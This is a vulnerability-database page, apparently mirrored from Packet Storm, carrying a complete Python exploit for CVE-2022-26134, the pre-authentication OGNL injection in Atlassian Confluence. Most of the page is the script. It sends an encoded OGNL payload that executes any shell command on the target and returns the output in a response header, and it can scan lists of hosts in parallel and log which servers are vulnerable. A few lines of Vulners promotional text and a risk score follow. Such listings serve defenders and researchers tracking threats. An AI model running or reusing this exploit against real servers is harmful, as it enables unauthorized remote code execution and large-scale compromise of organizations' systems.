Vulners
Lucene search
Confluence OGNL Injection Remote Code Execution
🗓️ 07 Jun 2022 00:00:00Reported by h3v0x, github.comType 
packetstorm🔗 packetstormsecurity.com👁 383 Views
10
`#!/usr/bin/python3
# Exploit Title: Confluence Pre-Auth Remote Code Execution via OGNL Injection
# Google Dork: N/A
# Date: 06/006/2022
# Exploit Author: h3v0x
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/confluence/download-archives
# Version: All < 7.4.17 versions before 7.18.1
# Tested on: -
# CVE : CVE-2022-26134
# https://github.com/h3v0x/CVE-2022-26134
import sys
import requests
import optparse
import multiprocessing
from requests.packages import urllib3
from requests.exceptions import MissingSchema, InvalidURL
urllib3.disable_warnings()
requestEngine = multiprocessing.Manager()
session = requests.Session()
global paramResults
paramResults = requestEngine.list()
globals().update(locals())
def spiderXpl(url):
globals().update(locals())
if not url.startswith('http'):
url='http://'+url
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36",
"Connection": "close",
"Accept-Encoding": "gzip, deflate"}
try:
response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)
if(response.status_code == 302):
print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])
inputBuffer = str(response.headers['X-Cmd-Response'])
paramResults.append('Vulnerable application found:'+url+'\n''Command result:'+inputBuffer+'\n')
else:
pass
except requests.exceptions.ConnectionError:
print('[x] Failed to Connect: '+url)
pass
except multiprocessing.log_to_stderr:
pass
except KeyboardInterrupt:
print('[!] Stoping exploit...')
exit(0)
except (MissingSchema, InvalidURL):
pass
def banner():
print('[-] CVE-2022-26134')
print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \n')
def main():
banner()
globals().update(locals())
sys.setrecursionlimit(100000)
if not optionsOpt.filehosts:
url = optionsOpt.url
spiderXpl(url)
else:
f = open(optionsOpt.filehosts)
urls = map(str.strip, f.readlines())
multiReq = multiprocessing.Pool(optionsOpt.threads_set)
try:
multiReq.map(spiderXpl, urls)
multiReq.close()
multiReq.join()
except UnboundLocalError:
pass
except KeyboardInterrupt:
exit(0)
if optionsOpt.output:
print("\n[!] Saving the output result in: %s" % optionsOpt.output)
with open(optionsOpt.output, "w") as f:
for result in paramResults:
f.write("%s\n" % result)
f.close()
if __name__ == "__main__":
parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help='Base target uri (ex. http://target-uri/)')
parser.add_option('-f', '--file', dest="filehosts", help='example.txt')
parser.add_option('-t', '--threads', dest="threads_set", type=int,default=10)
parser.add_option('-m', '--maxtimeout', dest="timeout", type=int,default=8)
parser.add_option('-o', '--output', dest="output", type=str, default='exploit_result.txt')
parser.add_option('-c', '--cmd', dest="command", type=str, default='id')
optionsOpt, args = parser.parse_args()
main()
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Jun 2022 00:00Current
10High risk
Vulners AI Score10
EPSS0.94408